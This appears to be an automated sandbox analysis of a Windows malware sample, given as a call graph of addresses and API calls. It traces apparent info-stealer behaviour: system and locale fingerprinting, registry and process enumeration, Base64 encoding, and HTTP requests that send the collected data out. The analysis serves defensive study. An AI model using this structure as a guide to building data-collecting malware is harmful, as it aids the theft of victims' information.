lstrcpy 14729->14730 14731 474cad 14730->14731 14732 48a9b0 4 API calls 14731->14732 14733 474ccc 14732->14733 14734 48a8a0 lstrcpy 14733->14734 14735 474cd5 14734->14735 14736 48a9b0 4 API calls 14735->14736 14737 474cf6 14736->14737 14738 48a8a0 lstrcpy 14737->14738 14739 474cff 14738->14739 14740 48a9b0 4 API calls 14739->14740 14741 474d1f 14740->14741 14742 48a8a0 lstrcpy 14741->14742 14743 474d28 14742->14743 14744 48a9b0 4 API calls 14743->14744 14745 474d47 14744->14745 14746 48a8a0 lstrcpy 14745->14746 14747 474d50 14746->14747 14748 48a920 3 API calls 14747->14748 14749 474d6e 14748->14749 14750 48a8a0 lstrcpy 14749->14750 14751 474d77 14750->14751 14752 48a740 lstrcpy 14751->14752 14753 474d92 14752->14753 14754 48a920 3 API calls 14753->14754 14755 474db3 14754->14755 14756 48a920 3 API calls 14755->14756 14757 474dba 14756->14757 14758 48a8a0 lstrcpy 14757->14758 14759 474dc6 14758->14759 14760 474de7 lstrlen 14759->14760 14761 474dfa 14760->14761 14762 474e03 lstrlen 14761->14762 15701 48aad0 14762->15701 14764 474e13 HttpSendRequestA 14765 474e32 InternetReadFile 14764->14765 14766 474e67 InternetCloseHandle 14765->14766 14771 474e5e 14765->14771 14768 48a800 14766->14768 14768->14690 14769 48a9b0 4 API calls 14769->14771 14770 48a8a0 lstrcpy 14770->14771 14771->14765 14771->14766 14771->14769 14771->14770 15708 48aad0 14772->15708 14774 4817c4 StrCmpCA 14775 4817cf ExitProcess 14774->14775 14776 4817d7 14774->14776 14777 4819c2 14776->14777 14778 4818ad StrCmpCA 14776->14778 14779 4818cf StrCmpCA 14776->14779 14780 48185d StrCmpCA 14776->14780 14781 48187f StrCmpCA 14776->14781 14782 481970 StrCmpCA 14776->14782 14783 4818f1 StrCmpCA 14776->14783 14784 481951 StrCmpCA 14776->14784 14785 481932 StrCmpCA 14776->14785 14786 481913 StrCmpCA 14776->14786 14787 48a820 lstrlen lstrcpy 14776->14787 14777->13695 14778->14776 14779->14776 14780->14776 14781->14776 14782->14776 14783->14776 14784->14776 14785->14776 14786->14776 14787->14776 14789 48a7a0 lstrcpy 14788->14789 14790 475979 14789->14790 14791 4747b0 2 API calls 14790->14791 14792 475985 14791->14792 14793 48a740 lstrcpy 14792->14793 14794 4759ba 14793->14794 14795 48a740 lstrcpy 14794->14795 14796 4759c7 14795->14796 14797 48a740 lstrcpy 14796->14797 14798 4759d4 14797->14798 14799 48a740 lstrcpy 14798->14799 14800 4759e1 14799->14800 14801 48a740 lstrcpy 14800->14801 14802 4759ee InternetOpenA StrCmpCA 14801->14802 14803 475a1d 14802->14803 14804 475fc3 InternetCloseHandle 14803->14804 14805 488b60 3 API calls 14803->14805 14806 475fe0 14804->14806 14807 475a3c 14805->14807 14809 479ac0 4 API calls 14806->14809 14808 48a920 3 API calls 14807->14808 14810 475a4f 14808->14810 14811 475fe6 14809->14811 14812 48a8a0 lstrcpy 14810->14812 14813 48a820 2 API calls 14811->14813 14815 47601f ctype 14811->14815 14817 475a58 14812->14817 14814 475ffd 14813->14814 14816 48a9b0 4 API calls 14814->14816 14820 48a7a0 lstrcpy 14815->14820 14818 476013 14816->14818 14821 48a9b0 4 API calls 14817->14821 14819 48a8a0 lstrcpy 14818->14819 14819->14815 14829 47604f 14820->14829 14822 475a82 14821->14822 14823 48a8a0 lstrcpy 14822->14823 14824 475a8b 14823->14824 14825 48a9b0 4 API calls 14824->14825 14826 475aaa 14825->14826 14827 48a8a0 lstrcpy 14826->14827 14828 475ab3 14827->14828 14830 48a920 3 API calls 14828->14830 14829->13701 14831 475ad1 14830->14831 14832 48a8a0 lstrcpy 14831->14832 14833 475ada 14832->14833 14834 48a9b0 4 API calls 14833->14834 14835 475af9 14834->14835 14836 48a8a0 lstrcpy 14835->14836 14837 475b02 14836->14837 14838 48a9b0 4 API calls 14837->14838 14839 475b21 14838->14839 14840 48a8a0 lstrcpy 14839->14840 14841 475b2a 14840->14841 14842 48a9b0 4 API calls 14841->14842 14843 475b56 14842->14843 14844 48a920 3 API calls 14843->14844 14845 475b5d 14844->14845 14846 48a8a0 lstrcpy 14845->14846 14847 475b66 14846->14847 14848 475b7c InternetConnectA 14847->14848 14848->14804 14849 475bac HttpOpenRequestA 14848->14849 14851 475fb6 InternetCloseHandle 14849->14851 14852 475c0b 14849->14852 14851->14804 14853 48a9b0 4 API calls 14852->14853 14854 475c1f 14853->14854 14855 48a8a0 lstrcpy 14854->14855 14856 475c28 14855->14856 14857 48a920 3 API calls 14856->14857 14858 475c46 14857->14858 14859 48a8a0 lstrcpy 14858->14859 14860 475c4f 14859->14860 14861 48a9b0 4 API calls 14860->14861 14862 475c6e 14861->14862 14863 48a8a0 lstrcpy 14862->14863 14864 475c77 14863->14864 14865 48a9b0 4 API calls 14864->14865 14866 475c98 14865->14866 14867 48a8a0 lstrcpy 14866->14867 14868 475ca1 14867->14868 14869 48a9b0 4 API calls 14868->14869 14870 475cc1 14869->14870 14871 48a8a0 lstrcpy 14870->14871 14872 475cca 14871->14872 14873 48a9b0 4 API calls 14872->14873 14874 475ce9 14873->14874 14875 48a8a0 lstrcpy 14874->14875 14876 475cf2 14875->14876 14877 48a920 3 API calls 14876->14877 14878 475d10 14877->14878 14879 48a8a0 lstrcpy 14878->14879 14880 475d19 14879->14880 14881 48a9b0 4 API calls 14880->14881 14882 475d38 14881->14882 14883 48a8a0 lstrcpy 14882->14883 14884 475d41 14883->14884 14885 48a9b0 4 API calls 14884->14885 14886 475d60 14885->14886 14887 48a8a0 lstrcpy 14886->14887 14888 475d69 14887->14888 14889 48a920 3 API calls 14888->14889 14890 475d87 14889->14890 14891 48a8a0 lstrcpy 14890->14891 14892 475d90 14891->14892 14893 48a9b0 4 API calls 14892->14893 14894 475daf 14893->14894 14895 48a8a0 lstrcpy 14894->14895 14896 475db8 14895->14896 14897 48a9b0 4 API calls 14896->14897 14898 475dd9 14897->14898 14899 48a8a0 lstrcpy 14898->14899 14900 475de2 14899->14900 14901 48a9b0 4 API calls 14900->14901 14902 475e02 14901->14902 14903 48a8a0 lstrcpy 14902->14903 14904 475e0b 14903->14904 14905 48a9b0 4 API calls 14904->14905 14906 475e2a 14905->14906 14907 48a8a0 lstrcpy 14906->14907 14908 475e33 14907->14908 14909 48a920 3 API calls 14908->14909 14910 475e54 14909->14910 14911 48a8a0 lstrcpy 14910->14911 14912 475e5d 14911->14912 14913 475e70 lstrlen 14912->14913 15709 48aad0 14913->15709 14915 475e81 lstrlen GetProcessHeap RtlAllocateHeap 15710 48aad0 14915->15710 14917 475eae lstrlen 14918 475ebe 14917->14918 14919 475ed7 lstrlen 14918->14919 14920 475ee7 14919->14920 14921 475ef0 lstrlen 14920->14921 14922 475f04 14921->14922 14923 475f1a lstrlen 14922->14923 15711 48aad0 14923->15711 14925 475f2a HttpSendRequestA 14926 475f35 InternetReadFile 14925->14926 14927 475f6a InternetCloseHandle 14926->14927 14931 475f61 14926->14931 14927->14851 14929 48a9b0 4 API calls 14929->14931 14930 48a8a0 lstrcpy 14930->14931 14931->14926 14931->14927 14931->14929 14931->14930 14933 481077 14932->14933 14934 481151 14933->14934 14935 48a820 lstrlen lstrcpy 14933->14935 14934->13703 14935->14933 14937 480db7 14936->14937 14938 480ea4 StrCmpCA 14937->14938 14939 480e27 StrCmpCA 14937->14939 14940 480e67 StrCmpCA 14937->14940 14941 480f17 14937->14941 14942 48a820 lstrlen lstrcpy 14937->14942 14938->14937 14939->14937 14940->14937 14941->13711 14942->14937 14946 480f67 14943->14946 14944 481044 14944->13719 14945 480fb2 StrCmpCA 14945->14946 14946->14944 14946->14945 14947 48a820 lstrlen lstrcpy 14946->14947 14947->14946 14949 48a740 lstrcpy 14948->14949 14950 481a26 14949->14950 14951 48a9b0 4 API calls 14950->14951 14952 481a37 14951->14952 14953 48a8a0 lstrcpy 14952->14953 14954 481a40 14953->14954 14955 48a9b0 4 API calls 14954->14955 14956 481a5b 14955->14956 14957 48a8a0 lstrcpy 14956->14957 14958 481a64 14957->14958 14959 48a9b0 4 API calls 14958->14959 14960 481a7d 14959->14960 14961 48a8a0 lstrcpy 14960->14961 14962 481a86 14961->14962 14963 48a9b0 4 API calls 14962->14963 14964 481aa1 14963->14964 14965 48a8a0 lstrcpy 14964->14965 14966 481aaa 14965->14966 14967 48a9b0 4 API calls 14966->14967 14968 481ac3 14967->14968 14969 48a8a0 lstrcpy 14968->14969 14970 481acc 14969->14970 14971 48a9b0 4 API calls 14970->14971 14972 481ae7 14971->14972 14973 48a8a0 lstrcpy 14972->14973 14974 481af0 14973->14974 14975 48a9b0 4 API calls 14974->14975 14976 481b09 14975->14976 14977 48a8a0 lstrcpy 14976->14977 14978 481b12 14977->14978 14979 48a9b0 4 API calls 14978->14979 14980 481b2d 14979->14980 14981 48a8a0 lstrcpy 14980->14981 14982 481b36 14981->14982 14983 48a9b0 4 API calls 14982->14983 14984 481b4f 14983->14984 14985 48a8a0 lstrcpy 14984->14985 14986 481b58 14985->14986 14987 48a9b0 4 API calls 14986->14987 14988 481b76 14987->14988 14989 48a8a0 lstrcpy 14988->14989 14990 481b7f 14989->14990 14991 487500 6 API calls 14990->14991 14992 481b96 14991->14992 14993 48a920 3 API calls 14992->14993 14994 481ba9 14993->14994 14995 48a8a0 lstrcpy 14994->14995 14996 481bb2 14995->14996 14997 48a9b0 4 API calls 14996->14997 14998 481bdc 14997->14998 14999 48a8a0 lstrcpy 14998->14999 15000 481be5 14999->15000 15001 48a9b0 4 API calls 15000->15001 15002 481c05 15001->15002 15003 48a8a0 lstrcpy 15002->15003 15004 481c0e 15003->15004 15712 487690 GetProcessHeap RtlAllocateHeap 15004->15712 15007 48a9b0 4 API calls 15008 481c2e 15007->15008 15009 48a8a0 lstrcpy 15008->15009 15010 481c37 15009->15010 15011 48a9b0 4 API calls 15010->15011 15012 481c56 15011->15012 15013 48a8a0 lstrcpy 15012->15013 15014 481c5f 15013->15014 15015 48a9b0 4 API calls 15014->15015 15016 481c80 15015->15016 15017 48a8a0 lstrcpy 15016->15017 15018 481c89 15017->15018 15719 4877c0 GetCurrentProcess IsWow64Process 15018->15719 15021 48a9b0 4 API calls 15022 481ca9 15021->15022 15023 48a8a0 lstrcpy 15022->15023 15024 481cb2 15023->15024 15025 48a9b0 4 API calls 15024->15025 15026 481cd1 15025->15026 15027 48a8a0 lstrcpy 15026->15027 15028 481cda 15027->15028 15029 48a9b0 4 API calls 15028->15029 15030 481cfb 15029->15030 15031 48a8a0 lstrcpy 15030->15031 15032 481d04 15031->15032 15033 487850 3 API calls 15032->15033 15034 481d14 15033->15034 15035 48a9b0 4 API calls 15034->15035 15036 481d24 15035->15036 15037 48a8a0 lstrcpy 15036->15037 15038 481d2d 15037->15038 15039 48a9b0 4 API calls 15038->15039 15040 481d4c 15039->15040 15041 48a8a0 lstrcpy 15040->15041 15042 481d55 15041->15042 15043 48a9b0 4 API calls 15042->15043 15044 481d75 15043->15044 15045 48a8a0 lstrcpy 15044->15045 15046 481d7e 15045->15046 15047 4878e0 3 API calls 15046->15047 15048 481d8e 15047->15048 15049 48a9b0 4 API calls 15048->15049 15050 481d9e 15049->15050 15051 48a8a0 lstrcpy 15050->15051 15052 481da7 15051->15052 15053 48a9b0 4 API calls 15052->15053 15054 481dc6 15053->15054 15055 48a8a0 lstrcpy 15054->15055 15056 481dcf 15055->15056 15057 48a9b0 4 API calls 15056->15057 15058 481df0 15057->15058 15059 48a8a0 lstrcpy 15058->15059 15060 481df9 15059->15060 15721 487980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15060->15721 15063 48a9b0 4 API calls 15064 481e19 15063->15064 15065 48a8a0 lstrcpy 15064->15065 15066 481e22 15065->15066 15067 48a9b0 4 API calls 15066->15067 15068 481e41 15067->15068 15069 48a8a0 lstrcpy 15068->15069 15070 481e4a 15069->15070 15071 48a9b0 4 API calls 15070->15071 15072 481e6b 15071->15072 15073 48a8a0 lstrcpy 15072->15073 15074 481e74 15073->15074 15723 487a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15074->15723 15077 48a9b0 4 API calls 15078 481e94 15077->15078 15079 48a8a0 lstrcpy 15078->15079 15080 481e9d 15079->15080 15081 48a9b0 4 API calls 15080->15081 15082 481ebc 15081->15082 15083 48a8a0 lstrcpy 15082->15083 15084 481ec5 15083->15084 15085 48a9b0 4 API calls 15084->15085 15086 481ee5 15085->15086 15087 48a8a0 lstrcpy 15086->15087 15088 481eee 15087->15088 15726 487b00 GetUserDefaultLocaleName 15088->15726 15091 48a9b0 4 API calls 15092 481f0e 15091->15092 15093 48a8a0 lstrcpy 15092->15093 15094 481f17 15093->15094 15095 48a9b0 4 API calls 15094->15095 15096 481f36 15095->15096 15097 48a8a0 lstrcpy 15096->15097 15098 481f3f 15097->15098 15099 48a9b0 4 API calls 15098->15099 15100 481f60 15099->15100 15101 48a8a0 lstrcpy 15100->15101 15102 481f69 15101->15102 15730 487b90 15102->15730 15104 481f80 15105 48a920 3 API calls 15104->15105 15106 481f93 15105->15106 15107 48a8a0 lstrcpy 15106->15107 15108 481f9c 15107->15108 15109 48a9b0 4 API calls 15108->15109 15110 481fc6 15109->15110 15111 48a8a0 lstrcpy 15110->15111 15112 481fcf 15111->15112 15113 48a9b0 4 API calls 15112->15113 15114 481fef 15113->15114 15115 48a8a0 lstrcpy 15114->15115 15116 481ff8 15115->15116 15742 487d80 GetSystemPowerStatus 15116->15742 15119 48a9b0 4 API calls 15120 482018 15119->15120 15121 48a8a0 lstrcpy 15120->15121 15122 482021 15121->15122 15123 48a9b0 4 API calls 15122->15123 15124 482040 15123->15124 15125 48a8a0 lstrcpy 15124->15125 15126 482049 15125->15126 15127 48a9b0 4 API calls 15126->15127 15128 48206a 15127->15128 15129 48a8a0 lstrcpy 15128->15129 15130 482073 15129->15130 15131 48207e GetCurrentProcessId 15130->15131 15744 489470 OpenProcess 15131->15744 15134 48a920 3 API calls 15135 4820a4 15134->15135 15136 48a8a0 lstrcpy 15135->15136 15137 4820ad 15136->15137 15138 48a9b0 4 API calls 15137->15138 15139 4820d7 15138->15139 15140 48a8a0 lstrcpy 15139->15140 15141 4820e0 15140->15141 15142 48a9b0 4 API calls 15141->15142 15143 482100 15142->15143 15144 48a8a0 lstrcpy 15143->15144 15145 482109 15144->15145 15749 487e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15145->15749 15148 48a9b0 4 API calls 15149 482129 15148->15149 15150 48a8a0 lstrcpy 15149->15150 15151 482132 15150->15151 15152 48a9b0 4 API calls 15151->15152 15153 482151 15152->15153 15154 48a8a0 lstrcpy 15153->15154 15155 48215a 15154->15155 15156 48a9b0 4 API calls 15155->15156 15157 48217b 15156->15157 15158 48a8a0 lstrcpy 15157->15158 15159 482184 15158->15159 15753 487f60 15159->15753 15162 48a9b0 4 API calls 15163 4821a4 15162->15163 15164 48a8a0 lstrcpy 15163->15164 15165 4821ad 15164->15165 15166 48a9b0 4 API calls 15165->15166 15167 4821cc 15166->15167 15168 48a8a0 lstrcpy 15167->15168 15169 4821d5 15168->15169 15170 48a9b0 4 API calls 15169->15170 15171 4821f6 15170->15171 15172 48a8a0 lstrcpy 15171->15172 15173 4821ff 15172->15173 15766 487ed0 GetSystemInfo wsprintfA 15173->15766 15176 48a9b0 4 API calls 15177 48221f 15176->15177 15178 48a8a0 lstrcpy 15177->15178 15179 482228 15178->15179 15180 48a9b0 4 API calls 15179->15180 15181 482247 15180->15181 15182 48a8a0 lstrcpy 15181->15182 15183 482250 15182->15183 15184 48a9b0 4 API calls 15183->15184 15185 482270 15184->15185 15186 48a8a0 lstrcpy 15185->15186 15187 482279 15186->15187 15768 488100 GetProcessHeap RtlAllocateHeap 15187->15768 15190 48a9b0 4 API calls 15191 482299 15190->15191 15192 48a8a0 lstrcpy 15191->15192 15193 4822a2 15192->15193 15194 48a9b0 4 API calls 15193->15194 15195 4822c1 15194->15195 15196 48a8a0 lstrcpy 15195->15196 15197 4822ca 15196->15197 15198 48a9b0 4 API calls 15197->15198 15199 4822eb 15198->15199 15200 48a8a0 lstrcpy 15199->15200 15201 4822f4 15200->15201 15774 4887c0 15201->15774 15204 48a920 3 API calls 15205 48231e 15204->15205 15206 48a8a0 lstrcpy 15205->15206 15207 482327 15206->15207 15208 48a9b0 4 API calls 15207->15208 15209 482351 15208->15209 15210 48a8a0 lstrcpy 15209->15210 15211 48235a 15210->15211 15212 48a9b0 4 API calls 15211->15212 15213 48237a 15212->15213 15214 48a8a0 lstrcpy 15213->15214 15215 482383 15214->15215 15216 48a9b0 4 API calls 15215->15216 15217 4823a2 15216->15217 15218 48a8a0 lstrcpy 15217->15218 15219 4823ab 15218->15219 15779 4881f0 15219->15779 15221 4823c2 15222 48a920 3 API calls 15221->15222 15223 4823d5 15222->15223 15224 48a8a0 lstrcpy 15223->15224 15225 4823de 15224->15225 15226 48a9b0 4 API calls 15225->15226 15227 48240a 15226->15227 15228 48a8a0 lstrcpy 15227->15228 15229 482413 15228->15229 15230 48a9b0 4 API calls 15229->15230 15231 482432 15230->15231 15232 48a8a0 lstrcpy 15231->15232 15233 48243b 15232->15233 15234 48a9b0 4 API calls 15233->15234 15235 48245c 15234->15235 15236 48a8a0 lstrcpy 15235->15236 15237 482465 15236->15237 15238 48a9b0 4 API calls 15237->15238 15239 482484 15238->15239 15240 48a8a0 lstrcpy 15239->15240 15241 48248d 15240->15241 15242 48a9b0 4 API calls 15241->15242 15243 4824ae 15242->15243 15244 48a8a0 lstrcpy 15243->15244 15245 4824b7 15244->15245 15787 488320 15245->15787 15247 4824d3 15248 48a920 3 API calls 15247->15248 15249 4824e6 15248->15249 15250 48a8a0 lstrcpy 15249->15250 15251 4824ef 15250->15251 15252 48a9b0 4 API calls 15251->15252 15253 482519 15252->15253 15254 48a8a0 lstrcpy 15253->15254 15255 482522 15254->15255 15256 48a9b0 4 API calls 15255->15256 15257 482543 15256->15257 15258 48a8a0 lstrcpy 15257->15258 15259 48254c 15258->15259 15260 488320 17 API calls 15259->15260 15261 482568 15260->15261 15262 48a920 3 API calls 15261->15262 15263 48257b 15262->15263 15264 48a8a0 lstrcpy 15263->15264 15265 482584 15264->15265 15266 48a9b0 4 API calls 15265->15266 15267 4825ae 15266->15267 15268 48a8a0 lstrcpy 15267->15268 15269 4825b7 15268->15269 15270 48a9b0 4 API calls 15269->15270 15271 4825d6 15270->15271 15272 48a8a0 lstrcpy 15271->15272 15273 4825df 15272->15273 15274 48a9b0 4 API calls 15273->15274 15275 482600 15274->15275 15276 48a8a0 lstrcpy 15275->15276 15277 482609 15276->15277 15823 488680 15277->15823 15279 482620 15280 48a920 3 API calls 15279->15280 15281 482633 15280->15281 15282 48a8a0 lstrcpy 15281->15282 15283 48263c 15282->15283 15284 48265a lstrlen 15283->15284 15285 48266a 15284->15285 15286 48a740 lstrcpy 15285->15286 15287 48267c 15286->15287 15288 471590 lstrcpy 15287->15288 15289 48268d 15288->15289 15833 485190 15289->15833 15291 482699 15291->13723 16021 48aad0 15292->16021 15294 475009 InternetOpenUrlA 15298 475021 15294->15298 15295 4750a0 InternetCloseHandle InternetCloseHandle 15297 4750ec 15295->15297 15296 47502a InternetReadFile 15296->15298 15297->13727 15298->15295 15298->15296 16022 4798d0 15299->16022 15301 480759 15302 480a38 15301->15302 15303 48077d 15301->15303 15304 471590 lstrcpy 15302->15304 15305 480799 StrCmpCA 15303->15305 15306 480a49 15304->15306 15307 4807a8 15305->15307 15308 480843 15305->15308 16198 480250 15306->16198 15310 48a7a0 lstrcpy 15307->15310 15313 480865 StrCmpCA 15308->15313 15312 4807c3 15310->15312 15315 471590 lstrcpy 15312->15315 15314 480874 15313->15314 15318 48096b 15313->15318 15316 48a740 lstrcpy 15314->15316 15317 48080c 15315->15317 15320 480881 15316->15320 15321 48a7a0 lstrcpy 15317->15321 15319 48099c StrCmpCA 15318->15319 15322 4809ab 15319->15322 15323 480a2d 15319->15323 15324 48a9b0 4 API calls 15320->15324 15325 480823 15321->15325 15326 471590 lstrcpy 15322->15326 15323->13731 15327 4808ac 15324->15327 15328 48a7a0 lstrcpy 15325->15328 15329 4809f4 15326->15329 15330 48a920 3 API calls 15327->15330 15331 48083e 15328->15331 15332 48a7a0 lstrcpy 15329->15332 15333 4808b3 15330->15333 16025 47fb00 15331->16025 15335 480a0d 15332->15335 15336 48a9b0 4 API calls 15333->15336 15337 48a7a0 lstrcpy 15335->15337 15338 4808ba 15336->15338 15339 480a28 15337->15339 15340 48a8a0 lstrcpy 15338->15340 16141 480030 15339->16141 15673 48a7a0 lstrcpy 15672->15673 15674 471683 15673->15674 15675 48a7a0 lstrcpy 15674->15675 15676 471695 15675->15676 15677 48a7a0 lstrcpy 15676->15677 15678 4716a7 15677->15678 15679 48a7a0 lstrcpy 15678->15679 15680 4715a3 15679->15680 15680->14554 15682 4747c6 15681->15682 15683 474838 lstrlen 15682->15683 15707 48aad0 15683->15707 15685 474848 InternetCrackUrlA 15686 474867 15685->15686 15686->14631 15688 48a740 lstrcpy 15687->15688 15689 488b74 15688->15689 15690 48a740 lstrcpy 15689->15690 15691 488b82 GetSystemTime 15690->15691 15693 488b99 15691->15693 15692 48a7a0 lstrcpy 15694 488bfc 15692->15694 15693->15692 15694->14646 15696 48a931 15695->15696 15697 48a988 15696->15697 15699 48a968 lstrcpy lstrcat 15696->15699 15698 48a7a0 lstrcpy 15697->15698 15700 48a994 15698->15700 15699->15697 15700->14649 15701->14764 15703 474eee 15702->15703 15704 479af9 LocalAlloc 15702->15704 15703->14652 15703->14654 15704->15703 15705 479b14 CryptStringToBinaryA 15704->15705 15705->15703 15706 479b39 LocalFree 15705->15706 15706->15703 15707->15685 15708->14774 15709->14915 15710->14917 15711->14925 15840 4877a0 15712->15840 15715 4876c6 RegOpenKeyExA 15717 487704 RegCloseKey 15715->15717 15718 4876e7 RegQueryValueExA 15715->15718 15716 481c1e 15716->15007 15717->15716 15718->15717 15720 481c99 15719->15720 15720->15021 15722 481e09 15721->15722 15722->15063 15724 487a9a wsprintfA 15723->15724 15725 481e84 15723->15725 15724->15725 15725->15077 15727 487b4d 15726->15727 15728 481efe 15726->15728 15847 488d20 LocalAlloc CharToOemW 15727->15847 15728->15091 15731 48a740 lstrcpy 15730->15731 15732 487bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15731->15732 15739 487c25 15732->15739 15733 487d18 15735 487d28 15733->15735 15736 487d1e LocalFree 15733->15736 15734 487c46 GetLocaleInfoA 15734->15739 15738 48a7a0 lstrcpy 15735->15738 15736->15735 15737 48a9b0 lstrcpy lstrlen lstrcpy lstrcat 15737->15739 15740 487d37 15738->15740 15739->15733 15739->15734 15739->15737 15741 48a8a0 lstrcpy 15739->15741 15740->15104 15741->15739 15743 482008 15742->15743 15743->15119 15745 489493 GetModuleFileNameExA CloseHandle 15744->15745 15746 4894b5 15744->15746 15745->15746 15747 48a740 lstrcpy 15746->15747 15748 482091 15747->15748 15748->15134 15750 487e68 RegQueryValueExA 15749->15750 15751 482119 15749->15751 15752 487e8e RegCloseKey 15750->15752 15751->15148 15752->15751 15754 487fb9 GetLogicalProcessorInformationEx 15753->15754 15755 487fd8 GetLastError 15754->15755 15756 488029 15754->15756 15764 488022 15755->15764 15765 487fe3 15755->15765 15760 4889f0 2 API calls 15756->15760 15759 4889f0 2 API calls 15762 482194 15759->15762 15761 48807b 15760->15761 15763 488084 wsprintfA 15761->15763 15761->15764 15762->15162 15763->15762 15764->15759 15764->15762 15765->15754 15765->15762 15848 4889f0 15765->15848 15851 488a10 GetProcessHeap RtlAllocateHeap 15765->15851 15767 48220f 15766->15767 15767->15176 15769 4889b0 15768->15769 15770 48814d GlobalMemoryStatusEx 15769->15770 15771 488163 __aulldiv 15770->15771 15772 48819b wsprintfA 15771->15772 15773 482289 15772->15773 15773->15190 15775 4887fb GetProcessHeap RtlAllocateHeap wsprintfA 15774->15775 15777 48a740 lstrcpy 15775->15777 15778 48230b 15777->15778 15778->15204 15780 48a740 lstrcpy 15779->15780 15782 488229 15780->15782 15781 488263 15783 48a7a0 lstrcpy 15781->15783 15782->15781 15784 48a9b0 lstrcpy lstrlen lstrcpy lstrcat 15782->15784 15786 48a8a0 lstrcpy 15782->15786 15785 4882dc 15783->15785 15784->15782 15785->15221 15786->15782 15788 48a740 lstrcpy 15787->15788 15789 48835c RegOpenKeyExA 15788->15789 15790 4883ae 15789->15790 15791 4883d0 15789->15791 15792 48a7a0 lstrcpy 15790->15792 15793 4883f8 RegEnumKeyExA 15791->15793 15794 488613 RegCloseKey 15791->15794 15804 4883bd 15792->15804 15795 48860e 15793->15795 15796 48843f wsprintfA RegOpenKeyExA 15793->15796 15797 48a7a0 lstrcpy 15794->15797 15795->15794 15798 4884c1 RegQueryValueExA 15796->15798 15799 488485 RegCloseKey RegCloseKey 15796->15799 15797->15804 15801 4884fa lstrlen 15798->15801 15802 488601 RegCloseKey 15798->15802 15800 48a7a0 lstrcpy 15799->15800 15800->15804 15801->15802 15803 488510 15801->15803 15802->15795 15805 48a9b0 4 API calls 15803->15805 15804->15247 15806 488527 15805->15806 15807 48a8a0 lstrcpy 15806->15807 15808 488533 15807->15808 15809 48a9b0 4 API calls 15808->15809 15810 488557 15809->15810 15811 48a8a0 lstrcpy 15810->15811 15812 488563 15811->15812 15813 48856e RegQueryValueExA 15812->15813 15813->15802 15814 4885a3 15813->15814 15815 48a9b0 4 API calls 15814->15815 15816 4885ba 15815->15816 15817 48a8a0 lstrcpy 15816->15817 15818 4885c6 15817->15818 15819 48a9b0 4 API calls 15818->15819 15820 4885ea 15819->15820 15821 48a8a0 lstrcpy 15820->15821 15822 4885f6 15821->15822 15822->15802 15824 48a740 lstrcpy 15823->15824 15825 4886bc CreateToolhelp32Snapshot Process32First 15824->15825 15826 4886e8 Process32Next 15825->15826 15827 48875d CloseHandle 15825->15827 15826->15827 15832 4886fd 15826->15832 15828 48a7a0 lstrcpy 15827->15828 15830 488776 15828->15830 15829 48a9b0 lstrcpy lstrlen lstrcpy lstrcat 15829->15832 15830->15279 15831 48a8a0 lstrcpy 15831->15832 15832->15826 15832->15829 15832->15831 15834 48a7a0 lstrcpy 15833->15834 15835 4851b5 15834->15835 15836 471590 lstrcpy 15835->15836 15837 4851c6 15836->15837 15852 475100 15837->15852 15839 4851cf 15839->15291 15843 487720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15840->15843 15842 4876b9 15842->15715 15842->15716 15844 487780 RegCloseKey 15843->15844 15845 487765 RegQueryValueExA 15843->15845 15846 487793 15844->15846 15845->15844 15846->15842 15847->15728 15849 4889f9 GetProcessHeap HeapFree 15848->15849 15850 488a0c 15848->15850 15849->15850 15850->15765 15851->15765 15853 48a7a0 lstrcpy 15852->15853 15854 475119 15853->15854 15855 4747b0 2 API calls 15854->15855 15856 475125 15855->15856 16012 488ea0 15856->16012 15858 475184 15859 475192 lstrlen 15858->15859 15860 4751a5 15859->15860 15861 488ea0 4 API calls 15860->15861 15862 4751b6 15861->15862 15863 48a740 lstrcpy 15862->15863 15864 4751c9 15863->15864 15865 48a740 lstrcpy 15864->15865 15866 4751d6 15865->15866 15867 48a740 lstrcpy 15866->15867 15868 4751e3 15867->15868 15869 48a740 lstrcpy 15868->15869 15870 4751f0 15869->15870 15871 48a740 lstrcpy 15870->15871 15872 4751fd InternetOpenA StrCmpCA 15871->15872 15873 47522f 15872->15873 15874 4758c4 InternetCloseHandle 15873->15874 15875 488b60 3 API calls 15873->15875 15881 4758d9 ctype 15874->15881 15876 47524e 15875->15876 15877 48a920 3 API calls 15876->15877 15878 475261 15877->15878 15879 48a8a0 lstrcpy 15878->15879 15880 47526a 15879->15880 15882 48a9b0 4 API calls 15880->15882 15885 48a7a0 lstrcpy 15881->15885 15883 4752ab 15882->15883 15884 48a920 3 API calls 15883->15884 15886 4752b2 15884->15886 15892 475913 15885->15892 15887 48a9b0 4 API calls 15886->15887 15888 4752b9 15887->15888 15889 48a8a0 lstrcpy 15888->15889 15890 4752c2 15889->15890 15891 48a9b0 4 API calls 15890->15891 15893 475303 15891->15893 15892->15839 15894 48a920 3 API calls 15893->15894 15895 47530a 15894->15895 15896 48a8a0 lstrcpy 15895->15896 15897 475313 15896->15897 15898 475329 InternetConnectA 15897->15898 15898->15874 15899 475359 HttpOpenRequestA 15898->15899 15901 4758b7 InternetCloseHandle 15899->15901 15902 4753b7 15899->15902 15901->15874 15903 48a9b0 4 API calls 15902->15903 15904 4753cb 15903->15904 15905 48a8a0 lstrcpy 15904->15905 15906 4753d4 15905->15906 15907 48a920 3 API calls 15906->15907 15908 4753f2 15907->15908 15909 48a8a0 lstrcpy 15908->15909 15910 4753fb 15909->15910 15911 48a9b0 4 API calls 15910->15911 15912 47541a 15911->15912 15913 48a8a0 lstrcpy 15912->15913 15914 475423 15913->15914 15915 48a9b0 4 API calls 15914->15915 15916 475444 15915->15916 15917 48a8a0 lstrcpy 15916->15917 15918 47544d 15917->15918 15919 48a9b0 4 API calls 15918->15919 15920 47546e 15919->15920 15921 48a8a0 lstrcpy 15920->15921 16013 488ead CryptBinaryToStringA 16012->16013 16017 488ea9 16012->16017 16014 488ece GetProcessHeap RtlAllocateHeap 16013->16014 16013->16017 16015 488ef4 ctype 16014->16015 16014->16017 16016 488f05 CryptBinaryToStringA 16015->16016 16016->16017 16017->15858 16021->15294 16264 479880 16022->16264 16024 4798e1 16024->15301 16026 48a740 lstrcpy 16025->16026 16027 47fb16 16026->16027 16199 48a740 lstrcpy 16198->16199 16200 480266 16199->16200 16201 488de0 2 API calls 16200->16201 16202 48027b 16201->16202 16203 48a920 3 API calls 16202->16203 16204 48028b 16203->16204 16205 